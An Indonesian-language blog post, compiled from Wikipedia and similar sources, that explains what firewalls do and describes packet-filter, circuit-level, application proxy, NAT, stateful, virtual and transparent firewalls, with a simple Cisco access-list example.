§ Network Firewall: Network ‘‘’’Firewall didesain untuk melindungi jaringan secara keseluruhan dari berbagai serangan. Umumnya dijumpai dalam dua bentuk, yakni sebuah perangkat terdedikasi atau sebagai sebuah perangkat lunak yang diinstalasikan dalam sebuah server. Contoh dari firewall ini adalah Microsoft Internet Security and Acceleration Server (ISA Server), Cisco PIX, Cisco ASA, IPTables dalam sistem operasi GNU/Linux, pf dalam keluarga sistem operasi Unix BSD, serta SunScreen dari Sun Microsystems, Inc. yang dibundel dalam sistem operasi Solaris. Network Firewall secara umum memiliki beberapa fitur utama, yakni apa yang dimiliki oleh personal firewall (packet filter firewall dan stateful firewall), Circuit Level Gateway, Application Level Gateway, dan juga NAT Firewall. Network Firewall umumnya bersifat transparan (tidak terlihat) dari pengguna dan menggunakan teknologi routing untuk menentukan paket mana yang diizinkan, dan mana paket yang akan ditolak.

Fungsi Firewall

Secara fundamental, firewall dapat melakukan hal-hal berikut:

§ Mengatur dan mengontrol lalu lintas jaringan

§ Melakukan autentikasi terhadap akses

§ Melindungi sumber daya dalam jaringan privat

§ Mencatat semua kejadian, dan melaporkan kepada administrator

Adapun fungsi Firewall di dalam jaringan adalah sebagai berikut :

  1. Packet Filtering : memeriksa header dari paket TCP/IP ( tergantung arsitektur jaringannya, dalam contoh ini adalah TCP IP ) dan memutuskan apakah data ini memiliki akses ke jaringan.
  2. Network Address Translation ( NAT ) : biasanya sebuah jaringan memiliki sebuah IP public dan di dalam jaringan sendiri memiliki IP tersendiri. Firewall berfungsi untuk meneruskan paket data dari luar jaringan ke dalam jaringan dengan benar sesuai IP komputer lokal.
  3. Application Proxy : firewall bisa mendeteksi protocol aplikasi tertentu yang lebih spesifik.
  4. Traffic management : mencatat dan memantau trafik jaringan

Masih banyak fungsi firewall seiring perkembangan jaringan dan teknologi pada software atau hardware Firewall.

Mengatur dan Mengontrol Lalu lintas jaringan

Fungsi pertama yang dapat dilakukan oleh firewall adalah firewall harus dapat mengatur dan mengontrol lalu lintas jaringan yang diizinkan untuk mengakses jaringan privat atau komputer yang dilindungi oleh firewall. Firewall melakukan hal yang demikian, dengan melakukan inspeksi terhadap paket-paket dan memantau koneksi yang sedang dibuat, lalu melakukan penapisan (filtering) terhadap koneksi berdasarkan hasil inspeksi paket dan koneksi tersebut.

Proses inspeksi Paket

Inspeksi paket ('packet inspection) merupakan proses yang dilakukan oleh firewall untuk 'menghadang' dan memproses data dalam sebuah paket untuk menentukan bahwa paket tersebut diizinkan atau ditolak, berdasarkan kebijakan akses (access policy) yang diterapkan oleh seorang administrator. Firewall, sebelum menentukan keputusan apakah hendak menolak atau menerima komunikasi dari luar, ia harus melakukan inspeksi terhadap setiap paket (baik yang masuk ataupun yang keluar) di setiap antarmuka dan membandingkannya dengan daftar kebijakan akses. Inspeksi paket dapat dilakukan dengan melihat elemen-elemen berikut, ketika menentukan apakah hendak menolak atau menerima komunikasi:

§ Alamat IP dari komputer sumber

§ Port sumber pada komputer sumber

§ Alamat IP dari komputer tujuan

§ Port tujuan data pada komputer tujuan

§ Protokol IP

§ Informasi header-header yang disimpan dalam paket

Koneksi dan Keadaan Koneksi

Agar dua host TCP/IP dapat saling berkomunikasi, mereka harus saling membuat koneksi antara satu dengan lainnya. Koneksi ini memiliki dua tujuan:

1. Komputer dapat menggunakan koneksi tersebut untuk mengidentifikasikan dirinya kepada komputer lain, yang meyakinkan bahwa sistem lain yang tidak membuat koneksi tidak dapat mengirimkan data ke komputer tersebut. Firewall juga dapat menggunakan informasi koneksi untuk menentukan koneksi apa yang diizinkan oleh kebijakan akses dan menggunakannya untuk menentukan apakah paket data tersebut akan diterima atau ditolak.

2. Koneksi digunakan untuk menentukan bagaimana cara dua host tersebut akan berkomunikasi antara satu dengan yang lainnya (apakah dengan menggunakan koneksi connection-oriented, atau connectionless).

http://upload.wikimedia.org/wikipedia/id/thumb/0/07/Ilustrasi-Firewall2.png/200px-Ilustrasi-Firewall2.png

http://bits.wikimedia.org/skins-1.5/common/images/magnify-clip.png

Ilustrasi mengenai percakapan antara dua buah host

Kedua tujuan tersebut dapat digunakan untuk menentukan keadaan koneksi antara dua host tersebut, seperti halnya cara manusia bercakap-cakap. Jika Amir bertanya kepada Aminah mengenai sesuatu, maka Aminah akan meresponsnya dengan jawaban yang sesuai dengan pertanyaan yang diajukan oleh Amir; Pada saat Amir melontarkan pertanyaannya kepada Aminah, keadaan percakapan tersebut adalah Amir menunggu respons dari Aminah. Komunikasi di jaringan juga mengikuti cara yang sama untuk memantau keadaan percakapan komunikasi yang terjadi.

Firewall dapat memantau informasi keadaan koneksi untuk menentukan apakah ia hendak mengizinkan lalu lintas jaringan. Umumnya hal ini dilakukan dengan memelihara sebuah tabel keadaan koneksi (dalam istilah firewall: state table) yang memantau keadaan semua komunikasi yang melewati firewall. Dengan memantau keadaan koneksi ini, firewall dapat menentukan apakah data yang melewati firewall sedang "ditunggu" oleh host yang dituju, dan jika ya, aka mengizinkannya. Jika data yang melewati firewall tidak cocok dengan keadaan koneksi yang didefinisikan oleh tabel keadaan koneksi, maka data tersebut akan ditolak. Hal ini umumnya disebut sebagai Stateful Inspection.

Stateful Packet Inspection

Ketika sebuah firewall menggabungkan stateful inspection dengan packet inspection, maka firewall tersebut dinamakan dengan Stateful Packet Inspection (SPI). SPI merupakan proses inspeksi paket yang tidak dilakukan dengan menggunakan struktur paket dan data yang terkandung dalam paket, tapi juga pada keadaan apa host-host yang saling berkomunikasi tersebut berada. SPI mengizinkan firewall untuk melakukan penapisan tidak hanya berdasarkan isi paket tersebut, tapi juga berdasarkan koneksi atau keadaan koneksi, sehingga dapat mengakibatkan firewall memiliki kemampuan yang lebih fleksibel, mudah diatur, dan memiliki skalabilitas dalam hal penapisan yang tinggi.

Salah satu keunggulan dari SPI dibandingkan dengan inspeksi paket biasa adalah bahwa ketika sebuah koneksi telah dikenali dan diizinkan (tentu saja setelah dilakukan inspeksi), umumnya sebuah kebijakan (policy) tidak dibutuhkan untuk mengizinkan komunikasi balasan karena firewall tahu respons apa yang diharapkan akan diterima. Hal ini memungkinkan inspeksi terhadap data dan perintah yang terkandung dalam sebuah paket data untuk menentukan apakah sebuah koneksi diizinkan atau tidak, lalu firewall akan secara otomatis memantau keadaan percakapan dan secara dinamis mengizinkan lalu lintas yang sesuai dengan keadaan. Ini merupakan peningkatan yang cukup signifikan jika dibandingkan dengan firewall dengan inspeksi paket biasa. Apalagi, proses ini diselesaikan tanpa adanya kebutuhan untuk mendefinisikan sebuah kebijakan untuk mengizinkan respons dan komunikasi selanjutnya. Kebanyakan firewall modern telah mendukung fungsi ini.

Melakukan autentikasi terhadap akses

Fungsi fundamental firewall yang kedua adalah firewall dapat melakukan autentikasi terhadap akses.

Protokol TCP/IP dibangun dengan premis bahwa protokol tersebut mendukung komunikasi yang terbuka. Jika dua host saling mengetahui alamat IP satu sama lainnya, maka mereka diizinkan untuk saling berkomunikasi. Pada awal-awal perkembangan Internet, hal ini boleh dianggap sebagai suatu berkah. Tapi saat ini, di saat semakin banyak yang terhubung ke Internet, mungkin kita tidak mau siapa saja yang dapat berkomunikasi dengan sistem yang kita miliki. Karenanya, firewall dilengkapi dengan fungsi autentikasi dengan menggunakan beberapa mekanisme autentikasi, sebagai berikut:

§ Firewall dapat meminta input dari pengguna mengenai nama pengguna (user name) serta kata kunci (password). Metode ini sering disebut sebagai extended authentication atau xauth. Menggunakan xauth pengguna yang mencoba untuk membuat sebuah koneksi akan diminta input mengenai nama dan kata kuncinya sebelum akhirnya diizinkan oleh firewall. Umumnya, setelah koneksi diizinkan oleh kebijakan keamanan dalam firewall, firewall pun tidak perlu lagi mengisikan input password dan namanya, kecuali jika koneksi terputus dan pengguna mencoba menghubungkan dirinya kembali.

§ Metode kedua adalah dengan menggunakan sertifikat digital dan kunci publik. Keunggulan metode ini dibandingkan dengan metode pertama adalah proses autentikasi dapat terjadi tanpa intervensi pengguna. Selain itu, metode ini lebih cepat dalam rangka melakukan proses autentikasi. Meskipun demikian, metode ini lebih rumit implementasinya karena membutuhkan banyak komponen seperti halnya implementasi infrastruktur kunci publik.

§ Metode selanjutnya adalah dengan menggunakan Pre-Shared Key (PSK) atau kunci yang telah diberitahu kepada pengguna. Jika dibandingkan dengan sertifikat digital, PSK lebih mudah diimplenentasikan karena lebih sederhana, tetapi PSK juga mengizinkan proses autentikasi terjadi tanpa intervensi pengguna. Dengan menggunakan PSK, setiap host akan diberikan sebuah kunci yang telah ditentukan sebelumnya yang kemudian digunakan untuk proses autentikasi. Kelemahan metode ini adalah kunci PSK jarang sekali diperbarui dan banyak organisasi sering sekali menggunakan kunci yang sama untuk melakukan koneksi terhadap host-host yang berada pada jarak jauh, sehingga hal ini sama saja meruntuhkan proses autentikasi. Agar tercapai sebuah derajat keamanan yang tinggi, umumnya beberapa organisasi juga menggunakan gabungan antara metode PSK dengan xauth atau PSK dengan sertifikat digital.

Dengan mengimplementasikan proses autentikasi, firewall dapat menjamin bahwa koneksi dapat diizinkan atau tidak. Meskipun jika paket telah diizinkan dengan menggunakan inspeksi paket (PI) atau berdasarkan keadaan koneksi (SPI), jika host tersebut tidak lolos proses autentikasi, paket tersebut akan dibuang.

Melindungi sumber daya dalam jaringan privat

Salah satu tugas firewall adalah melindungi sumber daya dari ancaman yang mungkin datang. Proteksi ini dapat diperoleh dengan menggunakan beberapa peraturan pengaturan akses (access control), penggunaan SPI, application proxy, atau kombinasi dari semuanya untuk mencegah host yang dilindungi dapat diakses oleh host-host yang mencurigakan atau dari lalu lintas jaringan yang mencurigakan. Meskipun demikian, firewall bukanlah satu-satunya metode proteksi terhadap sumber daya, dan mempercayakan proteksi terhadap sumber daya dari ancaman terhadap firewall secara eksklusif adalah salah satu kesalahan fatal. Jika sebuah host yang menjalankan sistem operasi tertentu yang memiliki lubang keamanan yang belum ditambal dikoneksikan ke Internet, firewall mungkin tidak dapat mencegah dieksploitasinya host tersebut oleh host-host lainnya, khususnya jika exploit tersebut menggunakan lalu lintas yang oleh firewall telah diizinkan (dalam konfigurasinya). Sebagai contoh, jika sebuah packet-inspection firewall mengizinkan lalu lintas HTTP ke sebuah web server yang menjalankan sebuah layanan web yang memiliki lubang keamanan yang belum ditambal, maka seorang pengguna yang "iseng" dapat saja membuat exploit untuk meruntuhkan web server tersebut karena memang web server yang bersangkutan memiliki lubang keamanan yang belum ditambal. Dalam contoh ini, web server tersebut akhirnya mengakibatkan proteksi yang ditawarkan oleh firewall menjadi tidak berguna. Hal ini disebabkan oleh firewall yang tidak dapat membedakan antara request HTTP yang mencurigakan atau tidak. Apalagi, jika firewall yang digunakan bukan application proxy. Oleh karena itulah, sumber daya yang dilindungi haruslah dipelihara dengan melakukan penambalan terhadap lubang-lubang keamanan, selain tentunya dilindungi oleh firewall.

Mencatat semua kejadian, dan melaporkan kepada administrator

Cara Kerja Firewall

Sumber lain :

Bila data dikirim ke dan dari jaringan atau komputer, maka dipecah menjadi paket. Terlepas dari data yang mereka bawa, paket ini juga membawa sebuah header yang berisi informasi. Hal ini seperti kotak paket yang dikirimkan kepada Anda. Selain parsel, ada serangkaian informasi atas kotak: nama Anda, nama pengirim, alamat Anda, dll.

Sebuah paket data membawa informasi seperti, misalnya, alamat IP, jenis data, alamat jaringan tujuan dan komputer, dll Firewall menginterpretasikan informasi ini 'overhead' serta isi data paket untuk membuat keputusan mengenai apakah akan membiarkan paket lewat atau tidak.

Firewall memiliki set standar kriteria untuk perlindungan generik, di mana mereka basis menjalankan mekanisme packet filtering. Tapi Anda bisa mengkonfigurasi pengaturan firewall untuk menaikkan atau menurunkan tingkat keamanan.

Anda juga dapat menentukan daftar program yang diinstal pada mesin anda yang ingin Anda untuk memberikan akses Internet. Setiap program tidak ada dalam daftar yang tidak akan diberikan akses ke Internet. Hal ini untuk menghindari berbahaya atau salah-dirancang program (seperti spyware) dapat menyebabkan masalah untuk sistem Anda melalui akses Internet. Anda juga dapat menentukan daftar alamat situs atau alamat IP yang Anda tidak ingin diakses dari komputer atau jaringan anda, dan dari mana mesin atau jaringan anda akan menerima tidak ada data. Ini hanya dapat berfungsi sebagai alat sensor, serta mengukur pelindung yang baik.

Router dan perangkat jaringan lainnya ering memiliki firewall tertanam di dalamnya, secara optimal dikonfigurasi untuk menyaring paket sesuai dengan layanan yang mereka tawarkan. Misalnya, jika sebuah router mendeteksi suatu paket yang tidak sesuai dengan layanan yang disediakan, maka akan dibuang.
Perhatikan bahwa firewall bukan merupakan pengganti perangkat lunak anti-virus. Bahkan Anda memiliki firewall terbesar melindungi sistem Anda, Anda tetap perlu memiliki anti-virus software.

Secara sederhana bisa digambarkan cara kerja dari Firewall

  • Ketika ada paket data yang masuk ke jaringan atau komputer maka Firewall akan mengecek header dari paket data tersebut. Kemudian menggunakan aturan jaringan maka firewall bisa menentukan apakah data paket ini bisa diteruskan atau tidak. Jika tidak maka akan ada pemblokiran, jika diijinkan maka paket data ini akan diteruskan sesuai mekanisme jaringan tersebut sehingga sampai ke komputer yang dimaksud.
  • Dan sebaliknya ketika ada paket data keluar maka Firewall pun bisa mengecek berdasarkan IP dan content. Disini biasanya jaringan bisa memblok akses sebuah divisi ke sebuah sumber daya jaringan. Atau mungkin pemblokiran content yang mengandung pornografi. Disini firewall memiliki aturan untuk memfilter permintaan seperti ini.

Tipe yang berbeda dari firewalls melalui traffic menggunakan metode yang

Berbeda :

Packet-Filter Firewall

http://upload.wikimedia.org/wikipedia/id/thumb/5/58/Firewall-ContohAccessControl.png/200px-Firewall-ContohAccessControl.png

http://bits.wikimedia.org/skins-1.5/common/images/magnify-clip.png

Contoh pengaturan akses (access control) yang diterapkan dalam firewall

Pada bentuknya yang paling sederhana, sebuah firewall adalah sebuah router atau komputer yang dilengkapi dengan dua buah NIC (Network Interface Card, kartu antarmuka jaringan) yang mampu melakukan penapisan atau penyaringan terhadap paket-paket yang masuk. Perangkat jenis ini umumnya disebut dengan packet-filtering router.

Firewall jenis ini bekerja dengan cara membandingkan alamat sumber dari paket-paket tersebut dengan kebijakan pengontrolan akses yang terdaftar dalam Access Control List firewall, router tersebut akan mencoba memutuskan apakah hendak meneruskan paket yang masuk tersebut ke tujuannya atau menghentikannya. Pada bentuk yang lebih sederhana lagi, firewall hanya melakukan pengujian terhadap alamat IP atau nama domain yang menjadi sumber paket dan akan menentukan apakah hendak meneruskan atau menolak paket tersebut. Meskipun demikian, packet-filtering router tidak dapat digunakan untuk memberikan akses (atau menolaknya) dengan menggunakan basis hak-hak yang dimiliki oleh pengguna.

http://upload.wikimedia.org/wikipedia/id/thumb/1/16/Firewall-PacketFilteringFirewall.png/200px-Firewall-PacketFilteringFirewall.png

http://bits.wikimedia.org/skins-1.5/common/images/magnify-clip.png

Cara kerja packet filter firewall

Packet-filtering router juga dapat dikonfigurasikan agar menghentikan beberapa jenis lalu lintas jaringan dan tentu saja mengizinkannya. Umumnya, hal ini dilakukan dengan mengaktifkan/menonaktifkan port TCP/IP dalam sistem firewall tersebut. Sebagai contoh, port 25 yang digunakan oleh Protokol SMTP (Simple Mail Transfer Protocol) umumnya dibiarkan terbuka oleh beberapa firewall untuk mengizinkan surat elektronik dari Internet masuk ke dalam jaringan privat, sementara port lainnya seperti port 23 yang digunakan oleh Protokol Telnet dapat dinonaktifkan untuk mencegah pengguna Internet untuk mengakses layanan yang terdapat dalam jaringan privat tersebut. Firewall juga dapat memberikan semacam pengecualian (exception) agar beberapa aplikasi dapat melewati firewall tersebut. Dengan menggunakan pendekatan ini, keamanan akan lebih kuat tapi memiliki kelemahan yang signifikan yakni kerumitan konfigurasi terhadap firewall: daftar Access Control List firewall akan membesar seiring dengan banyaknya alamat IP, nama domain, atau port yang dimasukkan ke dalamnya, selain tentunya juga exception yang diberlakukan.

Kelebihan dari Packet Filtering

– Berkecepatan tinggi

–Biasanya dapat digunakan untuk routers/switches yang sedang digunakan

(No additional equipment!)

– efektif

•Kekurangan dari Packet Filtering

–Pengaturannya menjadi sangat rumit

– Mudah misconfigure

–Pada dynamic protocols (seperti FTP) Pengaturanya sulit

–Tidak dapat melakukan content-based filtering (menghilangkan lampiran2

e-mail, javascript, ActiveX)

CONTOH PACKET FILTERING

SebuahPenyingkat suatu packet…

Source

SrcPort Destination DestPort

204.210.251.1 8104 128.146.2.20531337

A Cisco packet filter

access-list 2640 deny any 128.146.2.0 0.0.0.255 gt 1023

Circuit Level Gateway

http://upload.wikimedia.org/wikipedia/id/thumb/c/c3/Firewall-CircuitLevelFirewall.png/200px-Firewall-CircuitLevelFirewall.png

http://bits.wikimedia.org/skins-1.5/common/images/magnify-clip.png

Cara kerja circuit level firewall

Firewall jenis lainnya adalah Circuit-Level Gateway, yang umumnya berupa komponen dalam sebuahproxy server. Firewall jenis ini beroperasi pada level yang lebih tinggi dalam model referensi tujuh lapis OSI (bekerja pada lapisan sesi/session layer) daripada Packet Filter Firewall. Modifikasi ini membuat firewall jenis ini berguna dalam rangka menyembunyikan informasi mengenai jaringan terproteksi, meskipun firewall ini tidak melakukan penyaringan terhadap paket-paket individual yang mengalir dalam koneksi.

Dengan menggunakan firewall jenis ini, koneksi yang terjadi antara pengguna dan jaringan pun disembunyikan dari pengguna. Pengguna akan dihadapkan secara langsung dengan firewall pada saat proses pembuatan koneksi dan firewall pun akan membentuk koneksi dengan sumber daya jaringan yang hendak diakses oleh pengguna setelah mengubah alamat IP dari paket yang ditransmisikan oleh dua belah pihak. Hal ini mengakibatkan terjadinya sebuah sirkuit virtual (virtual circuit) antara pengguna dan sumber daya jaringan yang ia akses.

Firewall ini dianggap lebih aman dibandingkan dengan Packet-Filtering Firewall, karena pengguna eksternal tidak dapat melihat alamat IP jaringan internal dalam paket-paket yang ia terima, melainkan alamat IP dari firewall. Protokol yang populer digunakan sebagai Circuit-Level Gateway adalah SOCKS v5.

Application Level Firewall

http://upload.wikimedia.org/wikipedia/id/thumb/a/aa/Firewall-ApplicationLayerFirewall.png/200px-Firewall-ApplicationLayerFirewall.png

http://bits.wikimedia.org/skins-1.5/common/images/magnify-clip.png

Application Level Firewall (disebut juga sebagai application proxy atauapplication level gateway)

Firewall jenis lainnya adalah Application Level Gateway (atau Application-Level Firewall atau sering juga disebut sebagai Proxy Firewall), yang umumnya juga merupakan komponen dari sebuah proxy server. Firewall ini tidak mengizinkan paket yang datang untuk melewati firewall secara langsung. Tetapi, aplikasi proxy yang berjalan dalam komputer yang menjalankan firewall akan meneruskan permintaan tersebut kepada layanan yang tersedia dalam jaringan privat dan kemudian meneruskan respons dari permintaan tersebut kepada komputer yang membuat permintaan pertama kali yang terletak dalam jaringan publik yang tidak aman.

Umumnya, firewall jenis ini akan melakukan autentikasi terlebih dahulu terhadap pengguna sebelum mengizinkan pengguna tersebut untuk mengakses jaringan. Selain itu, firewall ini juga mengimplementasikan mekanisme auditing dan pencatatan (logging) sebagai bagian dari kebijakan keamanan yang diterapkannya. Application Level Firewall juga umumnya mengharuskan beberapa konfigurasi yang diberlakukan pada pengguna untuk mengizinkan mesin klien agar dapat berfungsi. Sebagai contoh, jika sebuah proxy FTP dikonfigurasikan di atas sebuah application layer gateway, proxy tersebut dapat dikonfigurasikan untuk mengizinlan beberapa perintah FTP, dan menolak beberapa perintah lainnya. Jenis ini paling sering diimplementasikan pada proxy SMTP sehingga mereka dapat menerima surat elektronik dari luar (tanpa menampakkan alamat e-mail internal), lalu meneruskan e-mail tersebut kepada e-mail server dalam jaringan. Tetapi, karena adanya pemrosesan yang lebih rumit, firewall jenis ini mengharuskan komputer yang dikonfigurasikan sebagai application gateway memiliki spesifikasi yang tinggi, dan tentu saja jauh lebih lambat dibandingkan dengan packet-filter firewall.

•Kelebihan dari Proxy Firewall

–Mereka tidak memperbolehkan koneksi secara langsung antara Host internal dan eksternal

–Dukungan authentikasi (Pembuktian keaslian sesuatu), ‘classes’ dari pengguna
–Dapat mengijinkan/menolak akses berdasarkan konten
–Dapat memelihara aktivitas log secara detail (termasuk partisi data dari suatu packets)

– Caching

•Kekurangan dari Proxy Firewall
–Lebih lambat dari packet filter firewalls
–Membutuhkan Perangkat keras tambahan

-untuk pengguna yang banyak, membutuhkan perangkat keras yg banyak pula

-perangkat keras lambat = servis lambat

–Beberapa firewalls membutuhkan konfigurasi special Client pada workstations.

–Ada yg tidak mendukung beberapa protocols (AIM, RealAudio, Napster,H.323)bervariasi tergantung dari vendor.

–Konfigurasi sangat rumit

-Harus melakukan konfigurasi pada proxy untuk masing2 protokol

NAT Firewall

NAT (Network Address Translation) Firewall secara otomatis menyediakan proteksi terhadap sistem yang berada di balik firewall karena NAT Firewall hanya mengizinkan koneksi yang datang dari komputer-komputer yang berada di balik firewall. Tujuan dari NAT adalah untuk melakukan multiplexing terhadap lalu lintas dari jaringan internal untuk kemudian menyampaikannya kepada jaringan yang lebih luas (MAN, WAN atau Internet) seolah-olah paket tersebut datang dari sebuah alamat IP atau beberapa alamat IP. NAT Firewall membuat tabel dalam memori yang mengandung informasi mengenai koneksi yang dilihat oleh firewall. Tabel ini akan memetakan alamat jaringan internal ke alamat eksternal. Kemampuan untuk menaruh keseluruhan jaringan di belakang sebuah alamat IP didasarkan terhadap pemetaan terhadap port-port dalam NAT firewall.

Lihat juga: Network Address Translation

Stateful Firewall

http://upload.wikimedia.org/wikipedia/id/thumb/0/08/Firewall-StatefulFirewall.png/200px-Firewall-StatefulFirewall.png

http://bits.wikimedia.org/skins-1.5/common/images/magnify-clip.png

Cara kerja stateful firewall

Stateful Firewall merupakan sebuah firewall yang menggabungkan keunggulan yang ditawarkan oleh packet-filtering firewall, NAT Firewall, Circuit-Level Firewall dan Proxy Firewall dalam satu sistem. Stateful Firewall dapat melakukan filtering terhadap lalu lintas berdasarkan karakteristik paket, seperti halnya packet-filtering firewall, dan juga memiliki pengecekan terhadap sesi koneksi untuk meyakinkan bahwa sesi koneksi yang terbentuk tersebut diizinlan. Tidak seperti Proxy Firewall atau Circuit Level Firewall, Stateful Firewall umumnya didesain agar lebih transparan (seperti halnya packet-filtering firewall atau NAT firewall). Tetapi, stateful firewall juga mencakup beberapa aspek yang dimiliki oleh application level firewall, sebab ia juga melakukan inspeksi terhadap data yang datang dari lapisan aplikasi (application layer) dengan menggunakan layanan tertentu. Firewall ini hanya tersedia pada beberapa firewall kelas atas, semacam Cisco PIX. Karena menggabungkan keunggulan jenis-jenis firewall lainnya, stateful firewall menjadi lebih kompleks.

Virtual Firewall

Virtual Firewall adalah sebutan untuk beberapa firewall logis yang berada dalam sebuah perangkat fisik (komputer atau perangkat firewall lainnya). Pengaturan ini mengizinkan beberapa jaringan agar dapat diproteksi oleh sebuah firewall yang unik yang menjalankan kebijakan keamanan yang juga unik, cukup dengan menggunakan satu buah perangkat. Dengan menggunakan firewall jenis ini, sebuah ISP (Internet Service Provider) dapat menyediakan layanan firewall kepada para pelanggannya, sehingga mengamankan lalu lintas jaringan mereka, hanya dengan menggunakan satu buah perangkat. Hal ini jelas merupakan penghematan biaya yang signifikan, meski firewall jenis ini hanya tersedia pada firewall kelas atas, seperti Cisco PIX 535.

Transparent Firewall

Transparent Firewall (juga dikenal sebagai bridging firewall) bukanlah sebuah firewall yang murni, tetapi ia hanya berupa turunan dari stateful Firewall. Daripada firewall-firewall lainnya yang beroperasi pada lapisan IP ke atas, transparent firewall bekerja pada lapisan Data-Link Layer, dan kemudian ia memantau lapisan-lapisan yang ada di atasnya. Selain itu, transparent firewall juga dapat melakukan apa yang dapat dilakukan oleh packet-filtering firewall, seperti halnya stateful firewall dan tidak terlihat oleh pengguna (karena itulah, ia disebut sebagai Transparent Firewall).

Intinya, transparent firewall bekerja sebagai sebuah bridge yang bertugas untuk menyaring lalu lintas jaringan antara dua segmen jaringan. Dengan menggunakan transparent firewall, keamanan sebuah segmen jaringan pun dapat diperkuat, tanpa harus mengaplikasikan NAT Filter. Transparent Firewall menawarkan tiga buah keuntungan, yakni sebagai berikut:

§ Konfigurasi yang mudah (bahkan beberapa produk mengklaim sebagai "Zero Configuration"). Hal ini memang karena transparent firewall dihubungkan secara langsung dengan jaringan yang hendak diproteksinya, dengan memodifikasi sedikit atau tanpa memodifikasi konfigurasi firewall tersebut. Karena ia bekerja pada data-link layer, pengubahan alamat IP pun tidak dibutuhkan. Firewall juga dapat dikonfigurasikan untuk melakukan segmentasi terhadap sebuah subnet jaringan antara jaringan yang memiliki keamanan yang rendah dan keamanan yang tinggi atau dapat juga untuk melindungi sebuah host, jika memang diperlukan.

§ Kinerja yang tinggi. Hal ini disebabkan oleh firewall yang berjalan dalam lapisan data-link lebih sederhana dibandingkan dengan firewall yang berjalan dalam lapisan yang lebih tinggi. Karena bekerja lebih sederhana, maka kebutuhan pemrosesan pun lebih kecil dibandingkan dengan firewall yang berjalan pada lapisan yang tinggi, dan akhirnya performa yang ditunjukannya pun lebih tinggi.

§ Tidak terlihat oleh pengguna (stealth). Hal ini memang dikarenakan Transparent Firewall bekerja pada lapisan data-link, dan tidak membutuhkan alamat IP yang ditetapkan untuknya (kecuali untuk melakukan manajemen terhadapnya, jika memang jenisnya managed firewall). Karena itulah, transparent firewall tidak dapat terlihat oleh para penyerang. Karena tidak dapat diraih oleh penyerang (tidak memiliki alamat IP), penyerang pun tidak dapat menyerangnya.

Sumber :

http://www.chapila.com/2011/01/apa-itu-firewall.html

http://www.wikipedia.com

http://www.scribd.com/doc/12504038/Apa-Itu-Firewall

http://www.bswebhost.com/2008/11/apa-itu-firewall/

Read more...